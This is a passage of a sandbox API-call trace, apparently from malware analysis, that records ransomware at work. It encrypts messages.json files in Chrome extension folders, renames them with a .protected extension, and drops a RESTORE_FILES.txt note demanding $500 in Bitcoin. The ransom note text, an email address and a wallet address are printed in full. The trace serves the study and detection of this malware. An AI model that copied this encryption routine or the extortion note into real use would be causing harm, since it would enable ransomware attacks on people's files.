(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.939] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.939] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.939] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.939] CloseHandle (hObject=0x164) returned 1 [0078.939] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.939] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0078.939] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0078.939] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0078.939] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0078.939] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0078.939] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el") returned 141 [0078.939] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0078.939] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0078.939] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\*") returned 143 [0078.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.940] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.940] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.940] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.940] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.940] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\.") returned 143 [0078.940] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.940] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.940] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.940] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.940] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.940] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.940] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\..") returned 144 [0078.940] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.940] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.940] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.940] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.940] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.940] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.940] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.940] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.940] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.940] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.940] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.941] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.941] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json") returned 155 [0078.941] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.941] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0078.942] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.942] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x104, lpOverlapped=0x0) returned 1 [0078.942] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.942] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.942] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.942] CloseHandle (hObject=0x168) returned 1 [0078.943] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.protected") returned 165 [0078.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.protected")) returned 1 [0078.943] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.943] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.944] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\RESTORE_FILES.txt") returned 159 [0078.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.944] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.944] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.945] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.945] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.945] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.945] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.945] CloseHandle (hObject=0x164) returned 1 [0078.945] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.945] lstrcmpiW (lpString1="en_GB", lpString2="Windows") returned -1 [0078.945] lstrcmpiW (lpString1="en_GB", lpString2="Program Files") returned -1 [0078.945] lstrcmpiW (lpString1="en_GB", lpString2="Program Files (x86)") returned -1 [0078.945] lstrcmpiW (lpString1="en_GB", lpString2="$Recycle.bin") returned 1 [0078.945] lstrcmpiW (lpString1="en_GB", lpString2="System Volume Information") returned -1 [0078.945] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB") returned 144 [0078.945] lstrcmpW (lpString1="en_GB", lpString2=".") returned 1 [0078.945] lstrcmpW (lpString1="en_GB", lpString2="..") returned 1 [0078.945] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\*") returned 146 [0078.945] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.946] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.946] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.946] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.946] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.946] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.946] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\.") returned 146 [0078.946] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.946] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.946] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.946] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.946] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.946] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.946] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.946] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\..") returned 147 [0078.946] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.946] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.946] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.946] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.946] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.946] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.946] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.946] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.946] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.946] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.946] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.946] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.946] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.948] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.948] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json") returned 158 [0078.948] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.948] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0078.949] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.949] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0078.949] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.949] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.949] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.949] CloseHandle (hObject=0x168) returned 1 [0078.949] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.protected") returned 168 [0078.949] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json.protected")) returned 1 [0078.950] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.950] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.950] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\RESTORE_FILES.txt") returned 162 [0078.950] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.951] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.951] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.952] lstrlenA 